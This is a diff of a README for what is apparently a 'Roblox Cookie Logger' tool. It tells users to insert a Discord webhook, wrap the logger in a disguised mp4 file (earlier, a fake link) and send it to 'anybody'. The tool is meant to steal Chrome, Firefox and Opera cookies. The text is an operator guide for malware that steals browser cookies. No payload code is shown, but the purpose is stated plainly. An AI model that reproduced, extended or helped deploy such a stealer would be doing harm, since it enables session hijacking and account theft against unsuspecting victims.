zbenntt/Roblox-Cookie-LoggerV3/README.md

 Step 4; get your discord webhook and put it in the box that says WEBHOOK_HERE

-Step 7; Click the create link and copy the link to your clipboard and send it to anybody
+Step 5; Where it says mp4 file here, click the small up arrow and go to the file where the mp4 is saved

+Step 7; Click Create mp4

 # What It Does
-Its a simple gui i made that create a fake link and it steals anybodys chrome, firefox, opera cookies
+Its a simple gui i made that creates a mp4 logger and it steals anybodys chrome, firefox, opera cookies

 # credits